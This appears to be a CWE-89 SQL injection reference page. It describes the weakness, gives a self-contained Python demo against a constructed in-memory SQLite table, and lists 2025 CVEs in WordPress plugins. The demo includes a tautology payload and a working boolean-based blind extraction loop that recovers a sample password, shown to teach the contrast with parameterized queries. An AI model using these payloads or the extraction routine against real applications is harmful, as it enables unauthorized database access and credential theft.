VYPR

CWE-89

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Abstraction: Base · Status: Stable · Likelihood of Exploit: High

Description

The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.
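The two halves of that description (SQL text built from user input versus input passed as data) are easiest to see side by side. The following is an added example, not code from the CWE entry or from any of the products listed below. It builds a throwaway in-memory SQLite table with constructed sample rows, runs the same lookup once with string concatenation and once with a bound parameter, and then drives a boolean-based blind extraction loop through the vulnerable version, since several of the CVEs on this page are classified as blind SQL injection. The table, column and function names are all assumptions made for the illustration.

```python
"""Added example for CWE-89 (not part of the original page).

The `users` table, its rows and the function names are constructed for
illustration only.
"""
import sqlite3
import string

# Constructed sample data: (name, password, is_admin)
SAMPLE_ROWS = [
    ("alice", "s3cret-alice", 1),
    ("bob", "hunter2", 0),
    ("carol", "correct-horse", 0),
]


def make_db():
    """Create an in-memory database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT, is_admin INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def find_user_vulnerable(conn, name):
    """CWE-89: `name` is pasted into the SQL text, so a quote in it ends the
    string literal and the rest is interpreted as SQL syntax."""
    sql = "SELECT name FROM users WHERE name = '" + name + "'"
    return [row[0] for row in conn.execute(sql)]


def find_user_safe(conn, name):
    """Hardened form: the value travels as a bound parameter. The driver
    never splices it into the statement text, so it cannot become syntax."""
    return [row[0] for row in conn.execute("SELECT name FROM users WHERE name = ?", (name,))]


def blind_extract(conn, victim, alphabet=string.ascii_lowercase + string.digits + "-", max_len=32):
    """Boolean-based blind extraction through find_user_vulnerable().

    Oracle: the vulnerable query returns the victim's row only when the
    injected AND-condition is true, so each character of the password can be
    recovered one guess at a time without ever seeing the password in output.
    Stops when no character in the alphabet matches (end of string)."""
    recovered = ""
    for pos in range(1, max_len + 1):          # SUBSTR is 1-indexed in SQLite
        for ch in alphabet:
            payload = f"{victim}' AND SUBSTR(password, {pos}, 1) = '{ch}"
            # Resulting SQL:
            #   SELECT name FROM users WHERE name = 'bob' AND SUBSTR(password, 1, 1) = 'h'
            if find_user_vulnerable(conn, payload):
                recovered += ch
                break
        else:
            break                                # no match: string exhausted
    return recovered


if __name__ == "__main__":
    db = make_db()
    tautology = "x' OR '1'='1"
    print("vulnerable:", find_user_vulnerable(db, tautology))   # every row
    print("safe:      ", find_user_safe(db, tautology))         # no row named that
    print("blind:     ", blind_extract(db, "bob"))               # password leaked
```

The tautology payload makes the vulnerable lookup return every row while the parameterized version returns nothing, because the same bytes are compared as a literal name. The blind loop shows why "Blind SQL Injection" in the entries below is not a lesser finding: the attacker needs only a true/false difference in the response, not an error message or a visible result set.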

Hierarchy (View 1000)

Parents

Children

Related attack patterns (CAPEC)

CAPEC-108 · CAPEC-109 · CAPEC-110 · CAPEC-470 · CAPEC-66 · CAPEC-7

CVEs mapped to this weakness (8,813)

page 66 of 441
  • CVE-2025-32681 · High · Apr 11, 2025
    risk 0.55 · cvss 8.5 · epss 0.00

    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WP Guru Error Log Viewer error-log-viewer-wp allows Blind SQL Injection. This issue affects Error Log Viewer: from n/a through <= 1.0.5.

  • CVE-2025-32650 · High · Apr 11, 2025
    risk 0.55 · cvss 8.5 · epss 0.00

    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Ability, Inc Accessibility Suite online-accessibility allows SQL Injection. This issue affects Accessibility Suite: from n/a through <= 4.18.

  • CVE-2025-32618 · High · Apr 11, 2025
    risk 0.55 · cvss 8.5 · epss 0.00

    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in PickPlugins Wishlist wishlist allows SQL Injection. This issue affects Wishlist: from n/a through <= 1.0.46.

  • CVE-2025-32567 · High · Apr 11, 2025
    risk 0.55 · cvss 8.5 · epss 0.00

    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in dev02ali Easy Post Duplicator easy-post-duplicator allows SQL Injection. This issue affects Easy Post Duplicator: from n/a through <= 1.0.1.

  • CVE-2025-32558 · High · Apr 11, 2025
    risk 0.55 · cvss 8.5 · epss 0.00

    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ketanajani Duplicate Title Checker duplicate-title-checker allows Blind SQL Injection. This issue affects Duplicate Title Checker: from n/a through <= 1.2.

  • CVE-2025-32687 · High · Apr 10, 2025
    risk 0.55 · cvss 8.5 · epss 0.00

    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Magnigenie Review Stars Count For WooCommerce review-stars-count-for-woocommerce allows SQL Injection. This issue affects Review Stars Count For WooCommerce: from n/a through <= 2.0.

  • CVE-2025-32149 · High · Apr 4, 2025
    risk 0.55 · cvss 8.5 · epss 0.00

    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in winkm89 teachPress teachpress allows SQL Injection. This issue affects teachPress: from n/a through <= 9.0.11.

  • CVE-2025-32148 · High · Apr 4, 2025
    risk 0.55 · cvss 8.5 · epss 0.00

    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Daisycon Daisycon prijsvergelijkers daisycon allows SQL Injection. This issue affects Daisycon prijsvergelijkers: from n/a through <= 4.8.4.

  • CVE-2025-31619 · High · Apr 1, 2025
    risk 0.55 · cvss 8.5 · epss 0.00

    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in marcoingraiti Actionwear products sync actionwear-products-sync allows SQL Injection. This issue affects Actionwear products sync: from n/a through <= 2.3.3.

  • CVE-2025-31564 · High · Apr 1, 2025
    risk 0.55 · cvss 8.5 · epss 0.00

    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in aitool Ai Auto Tool Content Writing Assistant (Gemini Writer, ChatGPT ) All in One ai-auto-tool allows Blind SQL Injection. This issue affects Ai Auto Tool Content Writing Assistant (Gemini Writer, ChatGPT ) All in One: from n/a through <= 2.2.6.

  • CVE-2025-31561 · High · Apr 1, 2025
    risk 0.55 · cvss 8.5 · epss 0.00

    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in CodeSolz Ultimate Push Notifications ultimate-push-notifications allows SQL Injection. This issue affects Ultimate Push Notifications: from n/a through <= 1.2.0.

  • CVE-2025-31089 · High · Apr 1, 2025
    risk 0.55 · cvss 8.5 · epss 0.00

    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Fahad Mahmood Order Splitter for WooCommerce woo-order-splitter allows SQL Injection. This issue affects Order Splitter for WooCommerce: from n/a through <= 5.3.0.

  • CVE-2025-31024 · High · Apr 1, 2025
    risk 0.55 · cvss 8.5 · epss 0.00

    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in randyjensen RJ Quickcharts rj-quickcharts allows SQL Injection. This issue affects RJ Quickcharts: from n/a through <= 0.6.1.

  • CVE-2025-30589 · High · Apr 1, 2025
    risk 0.55 · cvss 8.5 · epss 0.00

    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Dourou Flickr set slideshows flickr-set-slideshows allows SQL Injection. This issue affects Flickr set slideshows: from n/a through <= 0.9.

  • CVE-2025-31547 · High · Mar 31, 2025
    risk 0.55 · cvss 8.5 · epss 0.00

    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Aphotrax Uptime Robot Plugin for WordPress uptime-robot-monitor allows SQL Injection. This issue affects Uptime Robot Plugin for WordPress: from n/a through <= 2.3.

  • CVE-2025-31542 · High · Mar 31, 2025
    risk 0.55 · cvss 8.5 · epss 0.00

    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in wphocus My auctions allegro my-auctions-allegro-free-edition allows Blind SQL Injection. This issue affects My auctions allegro: from n/a through <= 3.6.20.

  • CVE-2025-31526 · High · Mar 31, 2025
    risk 0.55 · cvss 8.5 · epss 0.00

    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in eleopard Behance Portfolio Manager portfolio-manager-powered-by-behance allows SQL Injection. This issue affects Behance Portfolio Manager: from n/a through <= 1.7.5.

  • CVE-2025-31466 · High · Mar 28, 2025
    risk 0.55 · cvss 8.5 · epss 0.00

    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Falcon Solutions Duplicate Page and Post duplicate-post-and-page allows Blind SQL Injection. This issue affects Duplicate Page and Post: from n/a through <= 1.0.

  • CVE-2025-22783 · High · Mar 27, 2025
    risk 0.55 · cvss 8.5 · epss 0.01

    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in SEO Squirrly SEO Plugin by Squirrly SEO squirrly-seo allows SQL Injection. This issue affects SEO Plugin by Squirrly SEO: from n/a through <= 12.4.03.

  • CVE-2025-30819 · High · Mar 27, 2025
    risk 0.55 · cvss 8.5 · epss 0.00

    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Igor Benic Simple Giveaways giveasap allows SQL Injection. This issue affects Simple Giveaways: from n/a through <= 2.48.1.